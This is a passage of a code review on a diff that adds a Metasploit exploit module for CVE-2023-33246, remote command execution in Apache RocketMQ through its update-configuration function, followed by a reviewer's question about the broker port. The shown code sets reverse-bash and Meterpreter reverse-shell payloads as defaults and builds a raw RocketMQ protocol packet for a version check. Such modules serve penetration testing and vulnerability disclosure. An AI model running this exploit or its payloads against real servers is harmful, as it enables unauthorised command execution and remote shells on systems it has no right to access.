modules/exploits/multi/http/apache_rocketmq_update_config.rb

```diff
@@ -0,0 +1,161 @@
+          the update configuration function to execute commands as the system users that RocketMQ is running as.
+          Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.
+        },
+        'Author' => [
+          'Malayke', # PoC
+          'jheysel-r7'  # module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT#usage-examples'],
+          [ 'CVE', '2023-33246']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Automatic (Nix Command - Fetch based payload)',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :nix_cmd
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'WfsDelay' => 60
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The default RocketMQ broker port', 10911])
+      ]
+    )
+  end
+
+  def get_version(id)
+    # from https://github.com/apache/rocketmq/blob/develop/common/src/4d82b307ef50f5cba5717d0ebafeb3cabf336873/java/org/apache/rocketmq/common/MQVersion.java
+    version_list = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'rocketmq_versions_list.json'), mode: 'rb'))
+    version_list.fetch(id, "UNKNOWN_VERSION_ID_#{id})")
+  end
+
+  def check
+    data = '{"code":105,"extFields":{"Signature":"/u5P/wZUbhjanu4LM/UzEdo2u2I=","topic":"TBW102","AccessKey":"rocketmq2"},"flag":0,"language":"JAVA","opaque":1,"serializeTypeCurrentRPC":"JSON","version":401}'
+    data_length = "\x00\x00\x00" + [data.length].pack('C')
+    header = "\x00\x00\x00" + [data.length + data_length.length].pack('C')
+    begin
+      sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => 9876 })
```

Comment:
Broker ports should that be a datastore option?

Also consider if this service can give back the other port to connect to.